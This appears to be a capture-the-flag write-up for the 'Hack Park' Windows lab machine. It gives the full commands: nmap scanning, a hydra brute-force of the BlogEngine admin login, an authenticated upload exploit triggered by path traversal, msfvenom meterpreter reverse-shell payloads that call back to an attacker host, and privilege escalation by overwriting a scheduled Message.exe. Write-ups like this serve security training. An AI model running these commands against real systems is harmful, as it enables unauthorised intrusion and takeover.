Hack Park
BlogEngine Authenticated Exploitation - Abnormal WindowsScheduler Service PrivEsc
Starting off with the nmap scan
$ nmap -sV -sC -A 10.10.79.198
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-17 07:26 CEST
Nmap scan report for 10.10.79.198
Host is up (0.047s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
| http-robots.txt: 6 disallowed entries
| /Account/*.* /search /search.aspx /error404.aspx
|_/archive /archive.aspx
|_http-server-header: Microsoft-IIS/8.5
|_http-title: hackpark | hackpark amusements
3389/tcp open ssl/ms-wbt-server?
| rdp-ntlm-info:
| Target_Name: HACKPARK
| NetBIOS_Domain_Name: HACKPARK
| NetBIOS_Computer_Name: HACKPARK
| DNS_Domain_Name: hackpark
| DNS_Computer_Name: hackpark
| Product_Version: 6.3.9600
|_ System_Time: 2020-05-17T05:28:08+00:00
| ssl-cert: Subject: commonName=hackpark
| Not valid before: 2020-05-16T05:23:21
|_Not valid after: 2020-11-15T05:23:21
|_ssl-date: 2020-05-17T05:28:09+00:00; 0s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 78.79 secondsWe observe that we have a web server running on port 80
Directory Bruteforcing the web server gives us alot of hidden directories
The /admin directory is the entry point => Leads us to a Login Page designed by BlogEngine
Let's search some publicly available exploits for this BlogEngine => Unfortunately it has all Authenticated Vulnerabilities :(
We somehow have to get into this blog engine website so let's bruteforce it using hydra and assuming admin as the username with a list of common passwords
hydra -l amdin -P /usr/share/wordlists/rockyou.txt 10.10.56.204 http-post-form “/Account/login.aspx:__VIEWSTATE=X%2Fz3Mlty62z5Y8aCAMiDaFe%2B9SKdcf9226N9xQ01mq8rP30ZJRq5G7EwUwzkz3n9rzEXVYmhE%2BBRVjtKpusOG%2BclmdkWeaN46I%2FnUYO4uzqLV1jka6wmsfIKFhEdwy3oeh7DlUj8VUnfKjmAAhl6QNzNfhdXj13D13LFPh9wtvnHyBjYmqMzxEvWAL1mwoNVWxVTCra5DFu1l1gLSNfWkrXLzo7bQdYCnhV2xxpLa1JgaLGsxDUS3h25czmU7g3MCciYGEAgFFxv%2FATyhDiIQBlHJ154WMYnL52cM7MR81pZZNgK32WdRwy%2FvA2wQvi6YrjkLrEZsiepbdoKvQHZ6qqyPxH0j6K9BI3%2FlKKiT2cfS1Nm&__EVENTVALIDATION=tbMSuN0fZZiffwoWR2502NvWLKSDwmGhtVGh9KB%2FIf6hdNVf9UjamY4uMbjjKFAInyLeK%2Fz5%2ByO1yrvO44pVUZTCisUdcMS2k59fRgxCJ9mU9waI%2BiHVLyhzWS22LViSMdGRUhHURt84Cg9MNCxXY172nJrVA5WtJ7PavxhpRlqV8Wi3&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login Failed” -t 64
[80][http-post-form] host: 10.10.79.198 login: admin password: 1qaz2wsxNow that we have the password, let's log in to the login panel using the credentials we just retrieved with Hydra - Let's now examine the Authenticated Exploit
We just have to modify the exploit with our IP and port and save it as PostView.ascx, upload it in the
/app/editor/editpost.cshtmlAnd to trigger it we'll have to use the LFI which is in
?theme=../../App_Data/files
And set the listener ready => we have a shell :)
Privilege Escalation
Let's use msfvenom to generate a reverse shell payload, and gain another shell which is far more stable than the current one for the escalation
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.9.**.** LPORT=2345 -f exe -o revshell.exeA little bit of enumeration using the meterpreter shell !
meterpreter > sysinfo
Computer : HACKPARK
OS : Windows 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System
360 676 svchost.exe
376 4 smss.exe
528 520 csrss.exe
580 572 csrss.exe
592 520 wininit.exe
616 572 winlogon.exe
676 592 services.exe
684 592 lsass.exe
744 676 svchost.exe
788 676 svchost.exe
820 2552 cmd.exe x64 0 IIS APPPOOL\Blog C:\Windows\System32\cmd.exe
864 676 svchost.exe
884 616 dwm.exe
916 676 svchost.exe
944 676 svchost.exe
988 676 svchost.exe
1128 676 spoolsv.exe
1176 676 amazon-ssm-agent.exe
1244 676 svchost.exe
1268 676 LiteAgent.exe
1312 676 svchost.exe
1328 676 svchost.exe
1368 676 WService.exe
1476 676 msdtc.exe
1552 676 wlms.exe
1560 1368 WScheduler.exe
1576 676 Ec2Config.exe
1848 676 sppsvc.exe
2008 676 svchost.exe
2044 676 vds.exe
2316 744 WmiPrvSE.exe
2360 820 conhost.exe x64 0 IIS APPPOOL\Blog C:\Windows\System32\conhost.exe
2464 2144 WScheduler.exe
2536 916 taskhostex.exe
2552 1328 w3wp.exe x64 0 IIS APPPOOL\Blog C:\Windows\System32\inetsrv\w3wp.exe
2608 2600 explorer.exe
2940 820 revshell.exe x86 0 IIS APPPOOL\Blog c:\Windows\Temp\revshell.exe
3060 744 SppExtComObj.Exe
3068 2584 ServerManager.exe meterpreter > cd "c:\program files (x86)"
meterpreter > ls
Listing: c:\program files (x86)
===============================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2013-08-22 15:36:16 +0200 Common Files
40777/rwxrwxrwx 4096 dir 2013-08-22 17:39:30 +0200 Internet Explorer
40777/rwxrwxrwx 0 dir 2013-08-22 17:39:30 +0200 Microsoft.NET
40777/rwxrwxrwx 8192 dir 2019-08-04 13:36:42 +0200 SystemScheduler
40777/rwxrwxrwx 0 dir 2019-08-06 23:12:04 +0200 Uninstall Information
40777/rwxrwxrwx 0 dir 2013-08-22 17:39:30 +0200 Windows Mail
40777/rwxrwxrwx 0 dir 2013-08-22 17:39:30 +0200 Windows NT
40777/rwxrwxrwx 0 dir 2013-08-22 17:39:30 +0200 WindowsPowerShell
100666/rw-rw-rw- 174 fil 2013-08-22 17:39:32 +0200 desktop.ini
meterpreter > cd SystemScheduler
meterpreter > ls
Listing: c:\program files (x86)\SystemScheduler
===============================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 4096 dir 2019-08-04 13:36:53 +0200 Events
100666/rw-rw-rw- 60 fil 2019-08-04 13:36:42 +0200 Forum.url
100666/rw-rw-rw- 9813 fil 2019-08-04 13:36:42 +0200 License.txt
100666/rw-rw-rw- 871 fil 2019-08-04 13:37:02 +0200 LogFile.txt
100666/rw-rw-rw- 2805 fil 2019-08-04 13:36:53 +0200 LogfileAdvanced.txt
100777/rwxrwxrwx 536992 fil 2019-08-04 13:36:42 +0200 Message.exe
100777/rwxrwxrwx 445344 fil 2019-08-04 13:36:42 +0200 PlaySound.exe
100777/rwxrwxrwx 27040 fil 2019-08-04 13:36:42 +0200 PlayWAV.exe
100666/rw-rw-rw- 149 fil 2019-08-04 13:36:53 +0200 Preferences.ini
100777/rwxrwxrwx 485792 fil 2019-08-04 13:36:42 +0200 Privilege.exe
100666/rw-rw-rw- 10100 fil 2019-08-04 13:36:42 +0200 ReadMe.txt
100777/rwxrwxrwx 112544 fil 2019-08-04 13:36:42 +0200 RunNow.exe
100777/rwxrwxrwx 235936 fil 2019-08-04 13:36:42 +0200 SSAdmin.exe
100777/rwxrwxrwx 731552 fil 2019-08-04 13:36:42 +0200 SSCmd.exe
100777/rwxrwxrwx 456608 fil 2019-08-04 13:36:42 +0200 SSMail.exe
100777/rwxrwxrwx 1633696 fil 2019-08-04 13:36:42 +0200 Scheduler.exe
100777/rwxrwxrwx 491936 fil 2019-08-04 13:36:42 +0200 SendKeysHelper.exe
100777/rwxrwxrwx 437664 fil 2019-08-04 13:36:42 +0200 ShowXY.exe
100777/rwxrwxrwx 439712 fil 2019-08-04 13:36:42 +0200 ShutdownGUI.exe
100666/rw-rw-rw- 785042 fil 2019-08-04 13:36:42 +0200 WSCHEDULER.CHM
100666/rw-rw-rw- 703081 fil 2019-08-04 13:36:42 +0200 WSCHEDULER.HLP
100777/rwxrwxrwx 136096 fil 2019-08-04 13:36:42 +0200 WSCtrl.exe
100777/rwxrwxrwx 68512 fil 2019-08-04 13:36:42 +0200 WSLogon.exe
100666/rw-rw-rw- 33184 fil 2019-08-04 13:36:42 +0200 WSProc.dll
100666/rw-rw-rw- 2026 fil 2019-08-04 13:36:42 +0200 WScheduler.cnt
100777/rwxrwxrwx 331168 fil 2019-08-04 13:36:42 +0200 WScheduler.exe
100777/rwxrwxrwx 98720 fil 2019-08-04 13:36:42 +0200 WService.exe
100666/rw-rw-rw- 54 fil 2019-08-04 13:36:42 +0200 Website.url
100777/rwxrwxrwx 76704 fil 2019-08-04 13:36:42 +0200 WhoAmI.exe
100666/rw-rw-rw- 1150 fil 2019-08-04 13:36:42 +0200 alarmclock.ico
100666/rw-rw-rw- 766 fil 2019-08-04 13:36:42 +0200 clock.ico
100666/rw-rw-rw- 80856 fil 2019-08-04 13:36:42 +0200 ding.wav
100666/rw-rw-rw- 1637972 fil 2019-08-04 13:36:42 +0200 libeay32.dll
100777/rwxrwxrwx 40352 fil 2019-08-04 13:36:42 +0200 sc32.exe
100666/rw-rw-rw- 766 fil 2019-08-04 13:36:42 +0200 schedule.ico
100666/rw-rw-rw- 355446 fil 2019-08-04 13:36:42 +0200 ssleay32.dll
100666/rw-rw-rw- 6999 fil 2019-08-04 13:36:42 +0200 unins000.dat
100777/rwxrwxrwx 722597 fil 2019-08-04 13:36:42 +0200 unins000.exe
100666/rw-rw-rw- 6574 fil 2019-08-04 13:36:42 +0200 whiteclock.ico
meterpreter > cd events
meterpreter > ls
Listing: c:\program files (x86)\SystemScheduler\events
======================================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 1927 fil 2019-08-05 00:05:19 +0200 20198415519.INI
100666/rw-rw-rw- 18175 fil 2019-08-05 00:06:01 +0200 20198415519.INI_LOG.txt
100666/rw-rw-rw- 186 fil 2020-05-17 15:38:43 +0200 Administrator.flg
100666/rw-rw-rw- 182 fil 2020-05-17 15:38:18 +0200 SYSTEM_svc.flg
100666/rw-rw-rw- 0 fil 2020-05-17 15:38:43 +0200 Scheduler.flg
100666/rw-rw-rw- 449 fil 2019-08-04 13:36:53 +0200 SessionInfo.flg
100666/rw-rw-rw- 0 fil 2020-05-17 15:38:18 +0200 service.flg
meterpreter > cat 20198415519.INI_LOG.txt
08/04/19 15:06:01,Event Started Ok, (Administrator)
08/04/19 15:06:30,Process Ended. PID:2608,ExitCode:1,Message.exe (Administrator)
08/04/19 15:07:00,Event Started Ok, (Administrator)
08/04/19 15:07:34,Process Ended. PID:2680,ExitCode:4,Message.exe (Administrator)
08/04/19 15:08:00,Event Started Ok, (Administrator)
08/04/19 15:08:33,Process Ended. PID:2768,ExitCode:4,Message.exe (Administrator)
08/04/19 15:09:00,Event Started Ok, (Administrator)
08/04/19 15:09:34,Process Ended. PID:3024,ExitCode:4,Message.exe (Administrator)
08/04/19 15:10:00,Event Started Ok, (Administrator)
08/04/19 15:10:33,Process Ended. PID:1556,ExitCode:4,Message.exe (Administrator)
08/04/19 15:11:00,Event Started Ok, (Administrator)
08/04/19 15:11:33,Process Ended. PID:468,ExitCode:4,Message.exe (Administrator)
08/04/19 15:12:00,Event Started Ok, (Administrator)
08/04/19 15:12:33,Process Ended. PID:2244,ExitCode:4,Message.exe (Administrator)
08/04/19 15:13:00,Event Started Ok, (Administrator)
08/04/19 15:13:33,Process Ended. PID:1700,ExitCode:4,Message.exe (Administrator)
08/04/19 16:43:00,Event Started Ok,Can not display reminders while logged out. (SYSTEM_svc)*
08/04/19 16:44:01,Event Started Ok, (Administrator)
08/04/19 16:44:05,Process Ended. PID:2228,ExitCode:1,Message.exe (Administrator)
08/04/19 16:45:00,Event Started Ok, (Administrator)
08/04/19 16:45:20,Process Ended. PID:2640,ExitCode:1,Message.exe (Administrator)
08/04/19 16:46:00,Event Started Ok, (Administrator)
08/04/19 16:46:03,Process Ended. PID:2912,ExitCode:1,Message.exe (Administrator)
08/04/19 16:47:00,Event Started Ok, (Administrator)From the WindowsScheduler logs, we see that Message.exe is executed about every 30 seconds as administrator
We can take advantage of this to replace
Message.exewith our reverse shell so that it is executed as adminstrator => Basically just like a CronJob in Linux Sys
Time to replace C:\Program Files (x86)\SystemScheduler\Message.exe with a reverse shell. Let’s first generate a new reverse shell that we will name Message.exe
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.9.**.** LPORT=3456 -f exe -o Message.exeTransfer it to the machine and wait for the reverse shell - We'll have Administrator access :)
As the Message.exe was run by the Administrator !
Last updated
